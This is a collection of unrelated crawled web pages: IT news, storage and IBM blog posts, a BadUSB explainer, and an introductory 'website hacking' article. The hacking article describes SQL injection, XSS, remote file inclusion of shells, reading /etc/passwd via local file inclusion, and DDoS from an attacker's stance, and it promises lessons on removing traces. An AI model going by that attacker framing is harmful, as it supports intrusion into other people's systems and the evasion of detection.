The key seems to be educating users about when it is appropriate to use these features — an admittedly thin line of defense but perhaps the only realistic one. More powerful geolocation apps are on the way, and users need to be aware that some dark forces certainly will be looking to take advantage of them.
After all, the Marauder’s Map only worked when the user tapped the map with a wand and uttered the incantation, “I solemnly swear that I am up to no good.”
Kevin McCaney is a former editor of Defense Systems and GCN. | <urn:uuid:6fed014b-ab87-4018-a050-97c8bfc60bf2> | CC-MAIN-2017-09 | https://gcn.com/articles/2010/09/20/editorial-harry-potter-gis.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170434.7/warc/CC-MAIN-20170219104610-00160-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.954326 | 704 | 2.71875 | 3 |
I will explain the fourth point, that you should be expert in removing traces, in my future articles. Traces are very important. Please don’t ignore them or you will experience a lot of problems. Keep reading, or simply subscribe to our posts.
The primary form of SQL injection consists of code being directly inserted into user-input variables that are concatenated with SQL commands and executed. A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL command then the malicious code is executed.
Cross site scripting (XSS) occurs when a user inputs malicious data into a website, which causes the application to do something it wasn’t intended to do. XSS attacks are very popular and some of the biggest websites have been affected by them, including the FBI, CNN, eBay, Apple, Microsoft, and AOL.
Some website features commonly vulnerable to XSS attacks are:
• Search Engines
• Login Forms
• Comment Fields
Cross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection.
I will explain this in detail in later hacking classes, so keep reading.
3. REMOTE FILE INCLUSION
Remote file inclusion is the vulnerability most often found on websites.
Remote File Inclusion (RFI) occurs when a remote file, usually a shell (a graphical interface for browsing remote files and running your own code on a server), is included on a website which allows the hacker to execute server side commands as the current logged on user, and have access to files on the server. With this power the hacker can continue on to use local
exploits to escalate his privileges and take over the whole system.
RFI can lead to the following serious things on website:
- Code execution on the web server
- Denial of Service (DoS)
- Data Theft/Manipulation
4. LOCAL FILE INCLUSION
Local File Inclusion (LFI) is when you have the ability to browse through the server by means of directory transversal. One of the most common uses of LFI is to discover the /etc/passwd file. This file contains the user information of a Linux system. Hackers find sites vulnerable to LFI the same way I discussed for RFIs.
Let’s say a hacker found a vulnerable site, like www.target-site.com/index.php?p=about, by means of directory transversal he would then try to browse to the /etc/passwd file:
I will explain it in detail with practical website examples in latter sequential classes on website hacking.
This is simply called distributed denial of service attack. A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to carry it out, the motives for, and the targets of a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an internet site or service from functioning efficiently or at all, temporarily or indefinitely. In DDOS attacks we consume the bandwidth and resources of any website and make them unavailable to its legitimate users.
This category is not new, it is merely comprised of the five categories above, but I mentioned it separately because there are several exploits which cannot be covered in the aforementioned categories. I will explain them individually with examples. The basic idea behind this is to find the vulnerability in the website and exploit it to get the admin or moderator privileges so that you can manipulate things easily.
I hope you all now have an overview of website hacking. In consecutive future classes I will explain all of these techniques in details, so please keep reading.
IF YOU HAVE ANY QUERIES ASK IN THE COMMENTS… | <urn:uuid:76b67793-feda-4e86-9dfe-84d515b99af3> | CC-MAIN-2017-09 | https://www.hackingloops.com/6-ways-to-hack-or-deface-websites-online/?showComment=1312697219134 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171232.43/warc/CC-MAIN-20170219104611-00036-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.925406 | 872 | 3.296875 | 3 |
A few days ago I wrote about an artificial intelligence startup, Vicarious, which demonstrated software that breaks the widely used - and much disliked by users - CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) used to prevent software run by the bad guys from automating the creation of, and hacking into, accounts on Web sites.
The reason CAPTCHA is disliked by users is that it's become hard even for humans to pass the test; the distorted images employed have become so difficult to read most people have a significant trouble decoding the text and, as a consequence, often give up when creating accounts and using services.
A new company, Keypic, may have the answer to these problems by doing away with CAPTCHA altogether and replacing it with their own eponymously named verification system. In fact Keypic can not only rate how human a user is but can also detect spam submitted as comments.
Keypic works by presenting whatever form you please along with an image. The image can be as minimal as a single transparent pixel or it can be a logo or even an advertising banner . The purpose of the image is to ensure that it's retrieved (most hackers' automation won't bother with graphical elements, they'll usually just retrieve the form, fill it and then submit it).
Whether the image is retrieved is just one of the ten or so data points Keypic checks. Other data points include how long it takes for the form to be submitted (which reveals software that tries to submit at a high rate), what order are the fields filled in, what the IP address is, what browser is being used, how many requests are received per minute from a single IP address, and the characteristics of any text entered into fields other than name and password.
The data points are analyzed by comparing them to Keypic's database of thousands of other form submissions and a score calculated as to how fake the submission is considered to be. You can then decide based on that score whether to accept and act on the form data or reject the submission.
For a program to get past Keypic would require that it behave in a very human way taking enough time to respond, downloading all page content, limiting the submission rate from any single IP address, and so on. To defeat this range of tests would require some pretty creative coding and that's the key to detecting non-human interactions.
The client-side of Keypic is free and open source while the backend that actually determines the score is proprietary and closed source. Keypic is currently available as a plugin for WordPress, Drupal, Joomla, and TYPO3 as well as a REST Web service, a PHP Class, an for ASP and ASP.NET.
My only reservation about Keypic is that although the company is based in the US (in Walnut, CA, in Silicon Valley) their Web site is a horrible mess of poor design, misspellings, weak explanations, and broken links.
So, is Keypic more effective than CAPTCHA? That all depends on what you value. If you believe that you're losing traffic and users because CAPTCHA tests put them off then there's a very good reason to use Keypic. As of writing over 5,800 sites are using the system and over 113.5 million spam messages have been blocked without CAPTCHAs.
On the other hand if you are adamant that you can't tolerate any non-humans at all accessing your site you might want to stick with CAPTCHA ... remembering, of course, that the test has been shown to be broken at a level that will eventually (and, in fact, sooner rather than later) render it useless. I think my money is on Keypic. | <urn:uuid:c9fa77a8-da26-4afb-a665-2cd87adde3da> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2225794/security/keypic--replacing-captcha-without-annoying-users--updated-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00508-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.963875 | 763 | 2.5625 | 3 |
Learn about the threats, risks and how to protect yourself.
Recently there has been increased media coverage regarding "BadUSB".
BadUSB is a way to theoretically manipulate any USB device to be infected with a virus (or other types of malware). This means in plain terms that an attacker will take a regular USB hardware which contains a small microprocessor, manipulate the firmware (which is actually a small operating system for the microcontroller to work) and infect it with malware. This will turn the USB hardware into a tool to manipulate your computer further.
In reality, this is very hard to do for an attacker but not impossible. The security researchers that reveal this threat are usually using a specific USB flash drive (for which they have the firmware) and manipulate it.
The result is that the USB flash drive will trick your computer, pretend it is a keyboard and then execute some commands. Your computer cannot tell the difference if the input it gets is coming from you typing on the keyboard or if the manipulated USB device is actually sending commands. Both inputs look the same to your computer. For an attacker to do this with a USB device, other than the one he is familiar with, is not easy to do.
This threat is real but it has also been present since the introduction of USB, more than a decade ago. It is a weakness of the USB standard and of the most common operating systems such as Windows. Since the operating system has no built-in option to verify the firmware of USB hardware, it trusts that a device that is connected to the USB port is the device type it tells the operating system it is. For executables, your operating system checks their integrity using a process called "code signing”. This code signing check is not available for the firmware operating in a USB device.
If an attack occurs using the BadUSB method, your computer can be infected with any kind of malware. This is what your Anti-Virus (Anti-Malware) solution will or will not detect. At that point, it will be unfortunately too late, since your computer will have been compromised until it will have been disinfected, which could take hours, days or weeks. Please remember that at this stage this is just a proof of concept and there are no actual known attacks “in the wild”.
BadUSB can act like different input / output devices like physical keyboard, mouse, network adapter, phone, tablet, webcam, or authentication token. For example, if it pretends it is a keyboard or mouse, the malicious software can inject keystrokes and mouse clicks, performing multiple actions on the computer, like launching Microsoft Outlook and sending an e-mail to a certain address, with attached files from the user’s computer. If it pretends it is an authentication token, a BadUSB would force the computer to prompt a token password, which can then be stored on the flash drive and retrieved at a later date.
What Endpoint Protector can do to secure your network
What you can do to protect yourself now
Connect only USB devices from vendors you know (e.g. keyboard and mouse from a trusted vendor).
Keep your anti-malware updated. It will not scan the firmware but it should detect if the BadUSB tries to install or run malware.
Use a device control solution likeEndpoint Protector that will monitor the use of devices connected to your computer.
Make sure you use strong passwords for your user account on your computer and never leave it unlocked or unattended. | <urn:uuid:34aaf1dc-eebd-4f38-a912-3272d1bd5acf> | CC-MAIN-2017-09 | https://www.endpointprotector.com/solutions/badusb-protection | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00560-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.93241 | 715 | 3.25 | 3 |
Potential advantages include better backup and replication, centralized management, scalability, and sharing of resources, files, and data.
By Greg P. Schulz
The Internet has changed the way business is conducted. Information must be available 7x24x365, from anywhere in the world. New business models (e.g., "virtual stores") have emerged, forcing changes in technology infrastructures to support dynamic business requirements.
With the rapid and continued growth of the Internet has emerged a new category of business: sometimes referred to as Internet-Related Business (IRB). IRBs include Internet Service Providers (ISPs), Application Service Providers (ASPs), e-commerce companies, and others.
The common services needed by IRBs include networking, processing, management, and information storage. A storage area network (SAN) enables these services via storage resource sharing, file and data sharing, backup, replication, management, and scalability.
In a SAN or storage utility model, servers and storage resources plug into service access connection points.
SANs enable IRBs to remove or abstract physical storage and information from specific host systems. This flexibility enables companies to meet the changing and dynamic needs of the IRB environment, including acquisitions, mergers, expansion, and new services.
Storage management for IRBs
Networking technology is the basis of the infrastructure we now call the Internet or World Wide Web. Now, a similar transformation is occurring on the "other" (e.g., storage) side of servers. Several technologies exist to enable concepts such as "storage utilities" to be implemented in an open, cost-effective manner.
Storage area network is the generic term used to describe the combination of these technologies, including Fibre Channel. SANs and associated technology enable the storage utility model to be implemented.
For IRBs and other organizations, the potential benefits of SANs and storage utilities include:
- Increased ability to share information resources and data.
- Reduced duplication (hardware, service agreements, staffing).
- Centralized management of distributed environments.
- Reduced complexity (interfaces, devices, management, backup).
- Flexibility to adapt and implement new business objectives.
- Increased investment protection and asset utilization.
- Increased distance between servers and storage devices.
- Simplified backup and recovery for data protection.
SANs and storage utilities are conceptually similar to utilities such as phone and electric services providers. Rather than having one physical server with duplicated resources (disk, tape, backup, and management), each device plugs into a service access connection point (see figure above). From these connection points, the systems supporting various applications or IRB functions can access and use the storage or data services they need.
SANs enable replication, remote mirroring, centralized backup, and data sharing between various server platforms.
The storage utility, SAN, or data services model empowers IRBs to solve specific business issues. Consider an environment with two sites, one on the West Coast and the other on the East Coast (see figure). In this example, different aspects of IRB storage management can be addressed, including replication or remote mirroring, backup, and data sharing for Web, email, database, and news servers.
Critical data is replicated or remotely mirrored between the two locations, and perhaps others, for high availability and workload balancing. To help reduce management, replication and data migration are used to reduce the backup window, maintain data availability, and speed Web data migration.
Some common storage or data services required for IRBs include block, file, connection, backup, replication, management, and support services.
- Block services. The basic building block for a SAN or data services model is block storage, provided by RAID arrays. A block service device provides high availability via fully redundant components to provide high performance and fault isolation. Block service devices should be scalable, modular, and flexible to meet the changing needs of IRBs' dynamic application requirements. Storage allocation, security, and setup should be flexible and under user control. To exist in an open environment, block devices should be host independent, without requiring special host software or drivers.
- File services. File services provide file and data sharing using underlying block services to serve data and files to Web hosts and clients. Data and files are accessed via standard network interfaces (e.g., Ethernet, FDDI, ATM) using protocols such as NFS and CIFS/SMB. In the past, file services have been possible by attaching dedicated storage directly to host systems and serving it to clients or by dedicating storage to a file-server appliance. In the storage utility, SAN, or data services model, block storage is available for use by hosts, as well as for file services without being dedicated to any one platform.
- Connection services. Connection services provide the infrastructure and include Fibre Channel switches, hubs, host bus adapters, cabling, diagnostics, network interfaces, and management capabilities. The connection services should be interoperable, scalable, and modular to adapt to the dynamic needs of IRBs.
- Backup and recovery services. Whet-her restoring an accidentally deleted home page, restoring a journal file to resolve a billing or security issue, or receiving lost data, backup and recovery services complement high-availability block services.
Backup services can be used to migrate backups off LANs to shared tape libraries for LAN-free backup, which can evolve to server-less backup. Backup services should provide on-demand backup and restore, the ability to back up open files and databases without having to take applications off-line, and the ability to perform remote backup and recovery.
- Replication services. Block services with RAID protection, combined with backup/recovery and replication of data to other locations, not only provide the highest levels of data protection and accessibility for IRBs, but also management and configuration flexibility. Replication or remote mirroring can be used for data movement between data centers during application rollouts, turnovers, consolidations, and for load balancing. In addition, replication services and remote/local mirroring can help reduce backup windows for IRBs by keeping data available and providing multi-site protection of critical data.
IRBs provide data and information on a 7x24x365 basis. Flexible services to meet the dynamic needs of IRBs are needed to provide storage and access for critical data when and where it is needed. Implementing the storage utility model with SAN technology, information can now be stored where it is needed without having to have it physically connected to specific servers.
Greg P. Schulz is a senior technologist at MTI Technology Corp. (www.mti.com), in Anaheim, CA. | <urn:uuid:bb521d68-25b4-401f-a91f-b23c382b104e> | CC-MAIN-2017-09 | http://www.infostor.com/index/articles/display/65889/articles/infostor/volume-4/issue-2/features/sans-enable-internet-related-businesses.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171936.32/warc/CC-MAIN-20170219104611-00084-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.922868 | 1,369 | 2.703125 | 3 |
Recently, IBM and the University of Texas Medical Branch (UTMB) [launched an effort] using IBM's World Community Grid "virtual supercomputer" to allow laboratory tests on drug candidates for drug-resistant influenza strains and new strains, such as H1N1 (aka "swineflu"), in less than a month.
Researchers at the University of Texas Medical Branch will use [World Community Grid] to identify the chemical compounds most likely to stop the spread of the influenza viruses and begin testing these under laboratory conditions. The computational work adds up to thousands of years of computer time which will be compressed into just months using World Community Grid. As many as 10 percent of the drug candidates identified by calculations on World Community Grid are likely to show antiviral activity in the laboratory and move to further testing.
According to the researchers, without access to World Community Grid's virtual super computing power, the search for drug candidates would take a prohibitive amount of time and laboratory testing.
A few months after Larry's "call to action" in 2006, IBM and over twenty major worldwide public health institutions, including the World Health Organization [WHO] and the Centers for Disease Control and Prevention [CDC], [announced the Global Pandemic Initiative], a collaborative effort to help stem the spread of infectious diseases.
One might think that with our proximity to Mexico that the first cases would have been the border states, such as Arizona, but instead there were cases as far away as New York and Florida. The NYT explains in an article [Predicting Flu With the Aid of (George) Washington] that two rival universities, Northwestern University and Indiana University, both predicted that there would be about 2500 cases in the United States, based on air traffic control flight patterns, and the tracking data from a Web site called ["Where's George"] which tracks the movement of US dollar bills stamped with the Web site URL.
The estimates were fairly close. According to the Centers for Disease Control and Prevention [H1N1 Flu virus tracking page], there are currently 3009 cases of H1N1 in 45 states, as of this writing.
This is just another example on how an information infrastructure, used properly to provide insight, make predictions, and analyze potential cures, can help the world be a smarter planet. Fortunately, IBM is leading the way.Read More]
Comments (4) Visits (5000)
My post last week [Solid State Disk on DS8000 Disk Systems] kicked up some dust in the comment section.Fellow blogger BarryB (a member of the elite [Anti-Social Media gang from EMC]) tried to imply that 200GB solid state disk (SSD) drives were different or better than the 146GB drives used in IBM System Storage DS8000 disk systems. I pointed out that they are the actual same physical drive, just formatted differently.
To explain the difference, I will first have to go back to regular spinning Hard Disk Drives (HDD). There are variances in manufacturing, so how do you make sure that a spinning disk has AT LEAST the amount of space you are selling it as? The solution is to include extra. This is the same way that rice, flour, and a variety of other commodities are sold. Legally, if it says you are buying a pound or kilo of flour, then it must be AT LEAST that much to be legal labeling. Including some extra is a safe way to comply with the law. In the case of disk capacity, having some spare capacity and the means to use it follows the same general concept.
(Disk capacity is measured in multiples of 1000, in this case a Gigabyte (GB) = 1,000,000,000 bytes, not to be confused with [Gibibyte (GiB)] = 1,073,741,824 bytes, based on multiples of 1024.)
Let's say a manufacturer plans to sell 146GB HDD. We know that in some cases there might be bad sectors on the disk that won't accept written data on day 1, and there are other marginally-bad sectors that might fail to accept written data a few years later, after wear and tear. A manufacturer might design a 156GB drive with 10GB of spare capacity and format this with a defective-sector table that redirects reads/writes of known bad sectors to good ones. When a bad sector is discovered, it is added to the table, and a new sector is assigned out of the spare capacity.Over time, the amount of space that a drive can store diminishes year after year, and once it drops below its rated capacity, it fails to meet its legal requirements. Based on averages of manufacturing runs and material variances, these could then be sold as 146GB drives, with a life expectancy of 3-5 years.
With Solid State Disk, the technology requires a lot of tricks and techniques to stay above the rated capacity. For example, you can format a 256GB drive as a conservative 146GB usable, with an additional 110GB (75 percent) spare capacity to handle all of the wear-leveling. You could lose up to 22GB of cells per year, and still have the rated capacity for the full five-year life expectancy.
Alternatively, you could take a more aggressive format, say 200GB usable, with only 56GB (28 percent) of spare capacity. If you lost 22GB of cells per year, then sometime during the third year, hopefully under warranty, your vendor could replace the drive with a fresh new one, and it should last the rest of the five year time frame. The failed drive, having 190GB or so usable capacity, could then be re-issued legally as a refurbished 146GB drive to someone else.
The wear and tear on SSD happens mostly during erase-write cycles, so for read-intensive workloads, such as boot disks for operating system images, the aggressive 200GB format might be fine, and might last the full five years.For traditional business applications (70 percent read, 30 percent write) or more write-intensive workloads, IBM feels the more conservative 146GB format is a safer bet.
This should be of no surprise to anyone. When it comes to the safety, security and integrity of our client's data, IBM has always emphasized the conservative approach.[Read More]
Comments (6) Visits (6216)
Looks like fellow blogger and arch nemesis BarryB from EMC is once again stirring up trouble, this time he focuses his attention on IBM's leadership in Solid State Disk (SSD) on the IBM System Storage DS8000 disk systems in his post [IBM's amazing splash dance, part deux], a follow-up to [IBM's amazing splash dance] and multi-vendor tirade [don't miss the amazing vendor flash dance].
(Note: IBM [Guidelines] prevent me from picking blogfights, so this post is only to set the record straight on some misunderstandings, point to some positive press about IBM's leadership in this area, and for me to provide a different point of view.)
First, let's set the record straight on a few things. The [RedPaper is still in draft form] under review, and so some information has not yet been updated to reflect the current situation.
I find it amusing that BarryB's basic argument is that IBM's initial release of SSD disk on DS8000 is less than what the potential architecture could be extended to support much more. Actually, if you look at EMC's November release of Atmos, as well as their most recent announcement of V-Max, they basically say the same thing "Stay Tuned, this is just our initial release, with various restrictions and limitations, but more will follow." Architecturally, IBM DS8000 could support a mix of SSD and non-SSD on the same DA pairs, could support RAID6 and RAID10 as well, and could support larger capacity drives or use higher-capacity read-intensive formats. These could all be done via RPQ if needed, or in a follow-on release.
BarryB's second argument is that IBM is somehow "throwing cold water" on SSD technology. That somehow IBM is trying to discourage people from using SSD by offering disk systems with this technology. IBM offered SSD storage on BladeCenter servers LONG BEFORE any EMC disk system offering, and IBM continues to innovate in ways that allow the best business value of this new technology. Take for example this 24-page IBM Technical Brief:[IBM System z® and System Storage DS8000:Accelerating the SAP® Deposits Management Workload With Solid State Drives]. It is full of example configurations that show that SSD on IBM DS8000 can help in practical business applications. IBM takes a solution view, and worked with DB2, DFSMS, z/OS, High Performance FICON (zHPF), and down the stack to optimize performance to provide real business value innovation. Thanks to this synergy,IBM can provide 90 percent of the performance improvement with only 10 percent of the SSD disk capacity as EMC offerings. Now that's innovative!
The price and performance differences between FC and SATA (what EMC was mostly used to) is only 30-50 percent. But the price and performance differences between SSD and HDD is more than an order of magnitude in some cases 10-30x, similar to the differences between HDD and tape. Of course, if you want hybrid solutions that take best advantage of SSD+HDD, it makes more sense to go to IBM, the leading storage vendor that has been doing HDD+Tape hybrid solutions for the past 30 years. IBM understands this better, and has more experience dealing with these orders of magnitude than EMC.
But don't just take my word for it. Here is an excerpt from Jim Handy, from [Objective Analysis] market research firm, in a recent Weekly Review from [Pund-IT] (Volume 5, Issue 23--May 6, 2009):
As for why STEC put out a press release on their own this week without a corresponding IBM press release, I can only say that IBM already announced all of this support back in February, and I blogged about it in my post [Dynamic Infrastructure - Disk Announcements 1Q09]. This is not the first time one of IBM's suppliers has tried to drum up business in this manner. Intel often funds promotions for IBM System x servers (the leading Intel-based servers in the industry) to help drive more business for their Xeon processor.
So, BarryB, perhaps its time for you to take out your green pen and work up another one of your all-too-common retraction and corrections.[Read More]
Wrapping up this week's theme on Cloud Computing, I finish with an IBM announcement for two new products to help clients build private cloud environments from their existing Service Oriented Architecture (SOA) deployments.
With more than 7,000 customer implementations worldwide, IBM is the SOA market leader. Of course, both of these products above can be used with IBM System Storage solutions, including Cloud-Optimized Storage offerings like Grid Medical Archive Solution (GMAS), Grid Access Manager software, Scale-Out File Services (SoFS), and the IBM XIV disk system.
IBM is part of the "Cloud Computing 5" major vendors pushing the envelope (the other four are Google, Microsoft, Amazon and Yahoo). In fact, IBM has a number of initiatives that allow customers to leverage IBM software in a cloud. IBM is working in collaboration with Amazon Web Services (AWS), a subsidiary of Amazon.com, Inc. to make IBM software available in the Amazon Elastic Compute Cloud (Amazon EC2). WebSphere sMash, Informix Dynamic Server, DB2, and WebSphere Portal with Lotus Web Content Management Standard Edition are available today through a "pay as you go" model for both development and production instances. In addition to those products, IBM is also announcing the availability of IBM Mashup Center and Lotus Forms Turbo for development and test use in Amazon EC2, and intends to add WebSphere Application Server and WebSphere eXtreme Scale to these offerings.
For more about IBM's leadership in Cloud Computing, see the IBM [Press Release].Read More] | <urn:uuid:858ab9b4-f90f-4cd0-8edb-03321696ae21> | CC-MAIN-2017-09 | https://www.ibm.com/developerworks/community/blogs/InsideSystemStorage/date/200905?sortby=0&page=2&maxresults=5&lang=en | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170823.55/warc/CC-MAIN-20170219104610-00381-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.940178 | 2,521 | 3.140625 | 3 |
University researchers are studying the brains of honey bees in an attempt to build an autonomous flying robot.
By creating models of the systems in a bee's brain that control vision and sense of smell, scientists are hoping to build a flying robot that can do more than carry out pre-programmed instructions. Such a robot would be able to sense and act as autonomously as a bee.
Researchers at the University of Sheffield and the University of Sussex in England are teaming up to take on what they call one of the major challenges of science today -- building a robot with artificial intelligence good enough to perform complex tasks as well as an animal can.
If that's possible, the flying robot would be able to use its "sense of smell" to detect gases or other odors and then home in on the source.
"The development of an artificial brain is one of the greatest challenges in artificial intelligence," said James Marshall, lead project researcher at the University of Sheffield. "So far, researchers have typically studied brains such as those of rats, monkeys and humans. But actually simpler organisms, such as social insects, have surprisingly advanced cognitive abilities."
The universities are using GPU accelerators, donated by Nvidia, to perform the massive calculations needed to simulate a brain using a standard desktop PC, instead of a far more expensive supercomputer.
Mixing brain and robotic research isn't new.
Duke University researchers reported in 2008 that they had worked with Japanese scientists to use the neurons in a monkey's brain to control a robot. Scientists hoped the project would help them find ways to give movement back to people suffering from paralysis.
That research came on the heels of work done in 2007 at the University of Arizona, where scientists successfully connected a moth's brain to a robot. Linked to the brain of a hawk moth, the robot responded to what the moth was seeing and was able to move out of the way when an object approached the moth.
Scientists working on the moth project five years ago predicted that people will be using "hybrid" computers -- a combination of hardware and living organic tissue -- sometime between 2017 and 2022.
In the research on bees' brains, the scientists said they hope their findings can be used to build flying robots that could, for example, be used in search and rescue missions, perhaps to gather information that rescue teams could use to make decisions about how to proceed.
"Not only will this pave the way for many future advances in autonomous flying robots, but we also believe the computer modeling techniques we will be using will be widely useful to other brain modeling and computational neuroscience projects," said Thomas Nowotny, project leader at the University of Sussex.
Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin and on Google+, or subscribe to Sharon's RSS feed . Her email address is firstname.lastname@example.org. | <urn:uuid:4b2678e7-74cb-44c7-a26b-2462e7d50987> | CC-MAIN-2017-09 | http://www.computerworld.com/article/2491852/emerging-technology/researchers-study-bee-brains-to-develop-flying-robots.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00081-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.95012 | 602 | 4.09375 | 4 |
A study conducted at Texas A&M University has found that driver response times are significantly delayed when voicing messages aloud to your phone - troublesome news for the likes of Apple and its voice command system, Siri.
It is the first study to compare traditional texting with voice-to-text on a handheld device during driving.
Christine Yager, the woman who headed the study, told Reuters: "In each case, drivers took about twice as long to react as they did when they weren't texting. Eye contact to the roadway also decreased, no matter which texting method was used."
The research revolved around 43 participants, all of whom, were made to drive along a test track without using any electronic devices. They were then made to take the same route, whilst texting and then again whilst using voice-to-text.
Yager revealed that voice-to-text actually took longer than ordinary texting, due to the need to correct errors during transcription.
Research carried out by The Cellular Telecommunications Industry Association found that 6.1 billion text messages per day were sent in the United States in 2012 alone. Data collected from AAA, the national driver's association, revealed that 35 per cent of drivers admitted to reading a text or email while driving, whilst 26 per cent admitted to typing a message.
Yager voiced concerns that drivers actually feel safer whilst using the voice-to-text method of communicating whilst driving, even though driving performance is equally hindered. The worry is, that this may lead to a false belief that texting while using spoke commands is safe, when this isn't the case.
Last year, a survey carried out by ingenie, a driving insurance company for 17-25 year olds, asked 1,000 customers how they use their phone whilst driving. 17 per cent admitted to playing Angry Birds behind the wheel.
This doesn't bode well for Volkswagen; the German car giant has just unveiled the iBeetle, which is based around the idea of being able to manipulate your car through voice commands issued to the iPhone.
This story, "Apple's Siri Could Make You Crash" was originally published by Macworld U.K.. | <urn:uuid:29cf0ced-a147-49f2-8c1f-f9fb3571e0c1> | CC-MAIN-2017-09 | http://www.cio.com/article/2386443/mobile-apps/apple-s-siri-could-make-you-crash.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00257-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.974941 | 438 | 2.828125 | 3 |
Digital Reasoning is a leader in cognitive computing. We build software that understands human communication - in many languages, across many domains, and at enormous scale. We help people see the world more clearly so they can make a positive difference for humanity.
People observe patterns in the world around them and use those patterns to deal with the world. It's hard to teach computers about the world.
Cognitive computing is all about helping computers learn from data to make more accurate predictions over time. It relies on repeatable statistical patterns to generalize from examples. Knowledge representation and pattern retrieval are the basis of knowledge discovery and reasoning.
Many intelligent systems are taught using simple techniques and rules to capture everything important about a specific domain. Digital Reasoning takes an entirely different approach. Our software assembles an integrated circuit of algorithms that automagically organize information into a graph-based knowledge model to enable predictions based on a high fidelity representation of context.
In simple terms: It thinks more like people do. And, like the human mind, our technology quickly learns new things, adapts and gets smarter over time.
People have the unique ability to use knowledge and experience to understand situations in time and space. A person can grasp that the term “frequent flier miles” really means “illegal payments” in the context of a specific conversation. Computers can’t think that way. They often miss what’s simmering just below the surface. Yet, people need help from technology to make sense of large volumes of ambiguous data across a wide range of sources that are written in multiple languages.
Digital Reasoning solves this problem, by amplifying human intelligence with more comprehensive situational awareness. Our technology's ability to apply knowledge to data enables it to more quickly and effectively extract knowledge from data. Like a person, our software looks at communication in different ways and interprets different meanings of signals; then it uses reasoning and thoughtful user experience to clear away the ambiguity and pinpoint the truth. As a result, our solutions help assist people's actions and enable them to make timely and informed decisions.
At Digital Reasoning, we believe intelligence should not be reproduced synthetically without a clear purpose; rather it should be created to further humanity. A virtuous cycle of human creativity and advanced technology will bring more value out of data than ever before.
Whether it’s identifying terrorist threats, uncovering insider trading in the finance industry or helping to deliver better patient care, organizations are working to solve some extremely difficult problems. By amplifying human intelligence with external digital systems based on new machine learning capabilities, people will boost their capacity to process information in time and space—synthesizing what's important to them and, ultimately, predicting consequences of their actions. | <urn:uuid:3b50b3f4-fd6a-46b7-8192-9ec49e7044c2> | CC-MAIN-2017-09 | http://www.digitalreasoning.com/visionary-approach/more-human | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00257-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.929085 | 557 | 2.84375 | 3 |
Smart phone: 30 years in the making
- By Kevin McCaney
- Jul 08, 2013
Smart phones have become such ubiquitous tools for work and personal business that it’s easy to take them for granted, even only a few years after they first appeared. And they have revolutionized how public-sector agencies do business. But they didn’t just spring from Steve Jobs’ mind — the technology behind them can be traced back to GCN’s beginnings, and further, into government research projects. Here’s a brief look at what’s behind a smart phone’s key components.
Camera: NASA developed the concept of a digital camera in the 1960s. Kodak has the first camera in 1975, but in the ‘90s NASA developed new ways of miniaturizing them with the CMOS active-pixel sensor.
GPS receiver: The Global Positioning System project was started in 1972, became fully operational in 1995. In 2000, its highest-grade signals were opened up for civil use.
Network: The first analog cellular system, now known as 1G, was introduced in 1978. Cell phone use took off in the 1990s with 2G networks. 3G (mobile broadband) appeared in 2001, and by 2011 was giving way to 4G (WiMax and lTE), which uses IP packet switching.
Touch screen: The first multitouch device was created at the University of Toronto in 1982. The HP 150, among the first touch-screen computers, appeared the next year. Improvements over the years came with the Apple Newton (1993), Sony’s SmartSkin (2002) and other technologies. Touch screens took a leap forward in 2007 with the first iPhone. For the surface, many phones use Gorilla Glass.
System-on-a-chip: Thanks to Moore’s Law (1965) holding true, advances in processor cores, GPUs, and other components means they can be squeezed into a small, handheld form.
DRAM: Once the province of PCs, workstations and supercomputers, dynamic random access memory has been showing up in larger doses as smart phones get more sophisticated. According to one study, in 2011, no phone had more than 800M of DRAM; today, 4G, 8G and even 16G are becoming common.
Battery: Research into lithium ion batteries dates to the 1970s, but the first prototype was built in 1985 and the first Li-ion battery hit the market in 1991. Its density has tripled since, but that trails far behind advances with other components. Today, most improvements in battery life are credited to more efficient, low-power systems.
Power amplifier/PMIC: Two things in the battery’s corner, the power amplifier can extend battery life and speed up data rates, the PMIC is an integrated circuit designed to manage power requirements.
Storage: Flash memory cards began appearing in the 1990s, and grew smaller, more capacious and cheaper over the past decade. Today, you can have a smart phone with up to 128G of storage.
Sensors: Most smart phones have gyroscopes and accelerometers, and some new models are adding barometers, thermometers and hygrometers (for humidity). NASA began working on miniaturizes microsensors for weather research in 1992.
